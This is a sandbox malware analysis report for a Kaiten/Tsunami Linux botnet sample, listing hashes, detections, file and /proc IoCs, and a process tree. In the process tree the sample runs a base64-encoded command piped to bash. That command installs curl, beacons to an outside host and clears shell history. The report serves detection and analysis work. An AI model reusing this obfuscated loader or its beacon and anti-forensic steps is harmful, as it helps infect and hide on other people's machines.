kaiten | 0eb2c98d14fce41db0ac9352484438fc40489d6f40c915b659ecc84342aa83a6

Analysis

max time kernel
82s
max time network
68s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20231215-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20231215-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
28-12-2023 18:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f09c0d5883a221d2e5f762480e946a78
Size

42KB
MD5

f09c0d5883a221d2e5f762480e946a78
SHA1

506386147d393cef81019dda55ac85125914c6be
SHA256

0eb2c98d14fce41db0ac9352484438fc40489d6f40c915b659ecc84342aa83a6
SHA512

a7c13cbb7855172fcb6fea29da30ff256664fc9515fc25019579d9db1344014804316e43e919e95b6110b77d4023a340639b8cdb63b4a6022437316320793c20
SSDEEP

768:oZHhN4I6FWJosiC8bOi6c9rasu7upif9EIgXEB2QeXeoIz8Vj2zc3pTJBXG1wzq:+L4I6zdAi6c94SIgUBVeXO8Azc3pjSw+

Score

10^/10

kaiten botnet

Malware Config

Signatures

Detects Kaiten/Tsunami Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1519-1-0x0000000000400000-0x0000000000416f68-memory.dmp	family_kaiten2

Detects Kaiten/Tsunami payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1519-1-0x0000000000400000-0x0000000000416f68-memory.dmp	family_kaiten

Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
botnet kaiten

Reads runtime system information 59 IoCs

Reads data from /proc virtual filesystem.

Processes:

dpkgseddpkgsystemctldpkgdpkgdpkgseddpkgdpkgdpkgdpkgdpkgsediddpkgapt-getcpdpkgdpkgdpkgdpkgfindf09c0d5883a221d2e5f762480e946a78dpkgsedcpdpkgfinddpkgdpkgdpkgdpkgcpseddpkgdpkgcpdpkgdpkgdpkgfinddpkgdpkgdpkgseddpkgseddpkgdpkgfindseddpkg

description	ioc	process
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	id
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/sys/kernel/ngroups_max	apt-get
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/self/exe	f09c0d5883a221d2e5f762480e946a78
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/self/fd
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/1/sched	systemctl
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/sys/kernel/osrelease	systemctl
File opened for reading	/proc/filesystems	dpkg

Writes file to tmp directory 48 IoCs

Malware often drops required files in the /tmp directory.

Processes:

apt-getcptouchapt-keyapt-keycpapt-keytouchapt-keycpcptouchtouch

description	ioc
File opened for modification	/tmp/apt.conf.5ygGiO
File opened for modification	/tmp/apt.sig.XLvKEk
File opened for modification	/tmp/fileutl.message.xEIziz	apt-get
File opened for modification	/tmp/apt-key-gpghome.o5POtCtfqs/pubring.orig.gpg	cp
File opened for modification	/tmp/fileutl.message.4AWCCT	apt-get
File opened for modification	/tmp/apt.sig.21lb0G
File opened for modification	/tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg	touch
File opened for modification	/tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg	apt-key
File opened for modification	/tmp/apt.data.ZoiP0Q
File opened for modification	/tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg	apt-key
File opened for modification	/tmp/fileutl.message.qLPbJp	apt-get
File opened for modification	/tmp/apt-key-gpghome.lP3aH5RXO8/pubring.orig.gpg	cp
File opened for modification	/tmp/fileutl.message.4Am35S	apt-get
File opened for modification	/tmp/fileutl.message.JRDOIu	apt-get
File opened for modification	/tmp/fileutl.message.5mnKDj	apt-get
File opened for modification	/tmp/fileutl.message.PwJMWw	apt-get
File opened for modification	/tmp/apt.sig.XyhbkB
File opened for modification	/tmp/apt-key-gpghome.Dy6P39OCwo/gpg.1.sh	apt-key
File opened for modification	/tmp/apt.data.lfc2h1
File opened for modification	/tmp/fileutl.message.c0t5Gs	apt-get
File opened for modification	/tmp/fileutl.message.Ry5uh4	apt-get
File opened for modification	/tmp/apt-key-gpghome.o5POtCtfqs/gpg.1.sh	apt-key
File opened for modification	/tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg	touch
File opened for modification	/tmp/fileutl.message.p7Idh2	apt-get
File opened for modification	/tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg	apt-key
File opened for modification	/tmp/fileutl.message.TNKeuh	apt-get
File opened for modification	/tmp/fileutl.message.pMwRl6	apt-get
File opened for modification	/tmp/fileutl.message.MvPvWl	apt-get
File opened for modification	/tmp/fileutl.message.wADoCX	apt-get
File opened for modification	/tmp/apt.data.BIxS8y
File opened for modification	/tmp/apt-key-gpghome.Dy6P39OCwo/pubring.orig.gpg	cp
File opened for modification	/tmp/apt-key-gpghome.PUWKEmdlgl/pubring.orig.gpg	cp
File opened for modification	/tmp/apt-key-gpghome.PUWKEmdlgl/gpg.1.sh	apt-key
File opened for modification	/tmp/fileutl.message.1fsRhH	apt-get
File opened for modification	/tmp/fileutl.message.VT0HSF	apt-get
File opened for modification	/tmp/fileutl.message.PZb8hV	apt-get
File opened for modification	/tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg	apt-key
File opened for modification	/tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg	touch
File opened for modification	/tmp/apt-key-gpghome.lP3aH5RXO8/gpg.1.sh	apt-key
File opened for modification	/tmp/apt.conf.g1uyWL
File opened for modification	/tmp/fileutl.message.QwPGB8	apt-get
File opened for modification	/tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg	touch
File opened for modification	/tmp/apt.conf.TaBuRO
File opened for modification	/tmp/fileutl.message.lwEEZH	apt-get
File opened for modification	/tmp/fileutl.message.WTFVgK	apt-get
File opened for modification	/tmp/apt.conf.g9ukqV
File opened for modification	/tmp/apt.data.73Fbeh
File opened for modification	/tmp/apt.sig.BT4hCo

/tmp/f09c0d5883a221d2e5f762480e946a78
/tmp/f09c0d5883a221d2e5f762480e946a78
1⤵
- Reads runtime system information
PID:1519

/bin/sh
sh -c "echo aWYgISB0eXBlIGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGw7IHRoZW4gaWYgdHlwZSBhcHQtZ2V0IDI+L2Rldi9udWxsIDE+L2Rldi9udWxsOyB0aGVuIGFwdC1nZXQgdXBkYXRlIC0tZml4LW1pc3NpbmcgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyBhcHQtZ2V0IGluc3RhbGwgLXkgY3VybCAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbCA7IGFwdC1nZXQgaW5zdGFsbCAteSAtLXJlaW5zdGFsbCBjdXJsIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgZmkKaWYgdHlwZSB5dW0gMj4vZGV2L251bGwgMT4vZGV2L251bGw7IHRoZW4geXVtIGNsZWFuIGFsbCAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbCA7IHl1bSBpbnN0YWxsIC15IGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyB5dW0gcmVpbnN0YWxsIC15IGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyBmaQppZiB0eXBlIGFwayAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbDsgdGhlbiBhcGsgdXBkYXRlIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgYXBrIGFkZCBjdXJsIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgZmkgOyBmaSA7IGN1cmwgLXNMayBodHRwOi8vY2hpbWFlcmEuY2MvbG9nL2luZi5waHAgLW8gL2Rldi9udWxsIDsgaGlzdG9yeSAtYyA7IGNsZWFyCgo= | base64 -d | bash"
2⤵
PID:1520

/usr/bin/base64
base64 -d
3⤵
PID:1522

/bin/bash
bash
3⤵
PID:1523

/usr/bin/apt-get
apt-get update --fix-missing
4⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1524

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
5⤵
- Reads runtime system information
PID:1525

/usr/lib/apt/methods/http
/usr/lib/apt/methods/http
5⤵
PID:1526

/usr/lib/apt/methods/http
/usr/lib/apt/methods/http
5⤵
PID:1535

/usr/lib/apt/methods/http
/usr/lib/apt/methods/http
5⤵
PID:1537

/usr/lib/apt/methods/gpgv
/usr/lib/apt/methods/gpgv
5⤵
PID:1538

/usr/lib/apt/methods/gpgv
/usr/lib/apt/methods/gpgv
5⤵
PID:1539

/bin/sh
sh -c "[ ! -e /run/systemd/system ] || [ \$(id -u) -ne 0 ] || systemctl start --no-block apt-news.service esm-cache.service || true"
1⤵
PID:1528

/usr/bin/id
id -u
2⤵
- Reads runtime system information
PID:1529

/bin/systemctl
systemctl start --no-block apt-news.service esm-cache.service
2⤵
- Reads runtime system information
PID:1530

/usr/bin/apt-key
/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.XyhbkB /tmp/apt.data.73Fbeh
1⤵
- Writes file to tmp directory
PID:1541

/usr/bin/apt-config
apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
2⤵
PID:1543

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1544

/usr/bin/apt-config
apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
2⤵
PID:1545

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1546

/usr/bin/apt-config
apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
2⤵
PID:1547

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1548

/usr/bin/apt-config
apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
2⤵
PID:1549

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1550

/usr/bin/apt-config
apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring
2⤵
PID:1553

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1554

/usr/bin/apt-config
apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f
2⤵
PID:1555

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1556

/usr/bin/apt-config
apt-config shell GPGV Apt::Key::gpgvcommand
2⤵
PID:1558

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1559

/bin/mktemp
mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
2⤵
PID:1561

/bin/chmod
chmod 700 /tmp/apt-key-gpghome.o5POtCtfqs
2⤵
PID:1562

/bin/readlink
readlink -f /tmp/apt-key-gpghome.o5POtCtfqs
2⤵
PID:1563

/bin/rm
rm -f /tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg
2⤵
PID:1564

/usr/bin/touch
touch /tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg
2⤵
- Writes file to tmp directory
PID:1566

/usr/bin/apt-config
apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d
2⤵
PID:1567

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1569

/bin/readlink
readlink -f /etc/apt/trusted.gpg.d/
2⤵
PID:1570

/usr/bin/find
find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"
2⤵
- Reads runtime system information
PID:1571

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
2⤵
PID:1578

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
2⤵
PID:1583

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
2⤵
PID:1585

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
2⤵
PID:1587

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
2⤵
PID:1589

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
2⤵
PID:1591

/bin/cp
cp -a /tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg /tmp/apt-key-gpghome.o5POtCtfqs/pubring.orig.gpg
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1592

/usr/bin/gpgv
gpgv --homedir /tmp/apt-key-gpghome.o5POtCtfqs --keyring /tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.XyhbkB /tmp/apt.data.73Fbeh
2⤵
PID:1599

/usr/bin/gpgconf
gpgconf --kill all
2⤵
PID:1603

/usr/bin/gpg-connect-agent
gpg-connect-agent --no-autostart KILLAGENT
3⤵
PID:1604

/usr/bin/gpg-connect-agent
gpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end
3⤵
PID:1605

/usr/bin/gpg-connect-agent
gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR
3⤵
PID:1606

/bin/rm
rm -rf /tmp/apt-key-gpghome.o5POtCtfqs
2⤵
PID:1607

/usr/bin/sort
sort
1⤵
PID:1574

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1595

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1598

/usr/bin/apt-key
/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.21lb0G /tmp/apt.data.BIxS8y
1⤵
- Writes file to tmp directory
PID:1609

/usr/bin/apt-config
apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
2⤵
PID:1611

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1612

/usr/bin/apt-config
apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
2⤵
PID:1613

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1614

/usr/bin/apt-config
apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
2⤵
PID:1615

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1616

/usr/bin/apt-config
apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
2⤵
PID:1617

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1618

/usr/bin/apt-config
apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring
2⤵
PID:1619

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1620

/usr/bin/apt-config
apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f
2⤵
PID:1621

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1622

/usr/bin/apt-config
apt-config shell GPGV Apt::Key::gpgvcommand
2⤵
PID:1624

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1625

/bin/mktemp
mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
2⤵
PID:1626

/bin/chmod
chmod 700 /tmp/apt-key-gpghome.Dy6P39OCwo
2⤵
PID:1627

/bin/readlink
readlink -f /tmp/apt-key-gpghome.Dy6P39OCwo
2⤵
PID:1628

/bin/rm
rm -f /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg
2⤵
PID:1629

/usr/bin/touch
touch /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg
2⤵
- Writes file to tmp directory
PID:1630

/usr/bin/apt-config
apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d
2⤵
PID:1631

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1632

/bin/readlink
readlink -f /etc/apt/trusted.gpg.d/
2⤵
PID:1633

/usr/bin/find
find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"
2⤵
- Reads runtime system information
PID:1634

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
2⤵
PID:1639

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
2⤵
PID:1641

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
2⤵
PID:1643

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
2⤵
PID:1645

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
2⤵
PID:1647

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
2⤵
PID:1649

/bin/cp
cp -a /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.orig.gpg
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1650

/usr/bin/gpgv
gpgv --homedir /tmp/apt-key-gpghome.Dy6P39OCwo --keyring /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.21lb0G /tmp/apt.data.BIxS8y
2⤵
PID:1657

/usr/bin/gpgconf
gpgconf --kill all
2⤵
PID:1658

/usr/bin/gpg-connect-agent
gpg-connect-agent --no-autostart KILLAGENT
3⤵
PID:1659

/usr/bin/gpg-connect-agent
gpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end
3⤵
PID:1660

/usr/bin/gpg-connect-agent
gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR
3⤵
PID:1661

/bin/rm
rm -rf /tmp/apt-key-gpghome.Dy6P39OCwo
2⤵
PID:1662

/usr/bin/sort
sort
1⤵
PID:1637

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1653

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1656

/usr/bin/apt-key
/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.XLvKEk /tmp/apt.data.ZoiP0Q
1⤵
- Writes file to tmp directory
PID:1664

/usr/bin/apt-config
apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
2⤵
PID:1666

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1667

/usr/bin/apt-config
apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
2⤵
PID:1668

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1669

/usr/bin/apt-config
apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
2⤵
PID:1672

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1677

/usr/bin/apt-config
apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
2⤵
PID:1684

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1690

/usr/bin/apt-config
apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring
2⤵
PID:1701

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1713

/usr/bin/apt-config
apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f
2⤵
PID:1728

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1735

/usr/bin/apt-config
apt-config shell GPGV Apt::Key::gpgvcommand
2⤵
PID:1743

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1748

/bin/mktemp
mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
2⤵
PID:1758

/bin/chmod
chmod 700 /tmp/apt-key-gpghome.lP3aH5RXO8
2⤵
PID:1761

/bin/readlink
readlink -f /tmp/apt-key-gpghome.lP3aH5RXO8
2⤵
PID:1770

/bin/rm
rm -f /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg
2⤵
PID:1775

/usr/bin/touch
touch /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg
2⤵
- Writes file to tmp directory
PID:1780

/usr/bin/apt-config
apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d
2⤵
PID:1784

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1791

/bin/readlink
readlink -f /etc/apt/trusted.gpg.d/
2⤵
PID:1800

/usr/bin/find
find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"
2⤵
- Reads runtime system information
PID:1803

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
2⤵
PID:1814

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
2⤵
PID:1817

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
2⤵
PID:1821

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
2⤵
PID:1824

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
2⤵
PID:1826

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
2⤵
PID:1829

/bin/cp
cp -a /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.orig.gpg
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1834

/usr/bin/gpgv
gpgv --homedir /tmp/apt-key-gpghome.lP3aH5RXO8 --keyring /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.XLvKEk /tmp/apt.data.ZoiP0Q
2⤵
PID:1868

/usr/bin/gpgconf
gpgconf --kill all
2⤵
PID:1875

/usr/bin/gpg-connect-agent
gpg-connect-agent --no-autostart KILLAGENT
3⤵
PID:1877

/usr/bin/gpg-connect-agent
gpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end
3⤵
PID:1879

/usr/bin/gpg-connect-agent
gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR
3⤵
PID:1882

/bin/rm
rm -rf /tmp/apt-key-gpghome.lP3aH5RXO8
2⤵
PID:1886

/usr/bin/sort
sort
1⤵
PID:1809

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1844

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1863

/usr/bin/apt-key
/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.BT4hCo /tmp/apt.data.lfc2h1
1⤵
- Writes file to tmp directory
PID:1925

/usr/bin/apt-config
apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
2⤵
PID:1929

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1930

/usr/bin/apt-config
apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
2⤵
PID:1931

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1932

/usr/bin/apt-config
apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
2⤵
PID:1933

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1934

/usr/bin/apt-config
apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
2⤵
PID:1935

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1936

/usr/bin/apt-config
apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring
2⤵
PID:1937

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1938

/usr/bin/apt-config
apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f
2⤵
PID:1939

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1940

/usr/bin/apt-config
apt-config shell GPGV Apt::Key::gpgvcommand
2⤵
PID:1942

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1943

/bin/mktemp
mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
2⤵
PID:1944

/bin/chmod
chmod 700 /tmp/apt-key-gpghome.PUWKEmdlgl
2⤵
PID:1945

/bin/readlink
readlink -f /tmp/apt-key-gpghome.PUWKEmdlgl
2⤵
PID:1946

/bin/rm
rm -f /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg
2⤵
PID:1947

/usr/bin/touch
touch /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg
2⤵
- Writes file to tmp directory
PID:1948

/usr/bin/apt-config
apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d
2⤵
PID:1949

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1950

/bin/readlink
readlink -f /etc/apt/trusted.gpg.d/
2⤵
PID:1951

/usr/bin/find
find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"
2⤵
- Reads runtime system information
PID:1952

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
2⤵
PID:1957

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
2⤵
PID:1959

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
2⤵
PID:1961

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
2⤵
PID:1963

/usr/bin/cmp
cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
2⤵
PID:1965

/bin/cat
cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
2⤵
PID:1967

/bin/cp
cp -a /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.orig.gpg
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1968

/usr/bin/gpgv
gpgv --homedir /tmp/apt-key-gpghome.PUWKEmdlgl --keyring /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.BT4hCo /tmp/apt.data.lfc2h1
2⤵
PID:1975

/usr/bin/gpgconf
gpgconf --kill all
2⤵
PID:1976

/usr/bin/gpg-connect-agent
gpg-connect-agent --no-autostart KILLAGENT
3⤵
PID:1977

/usr/bin/gpg-connect-agent
gpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end
3⤵
PID:1978

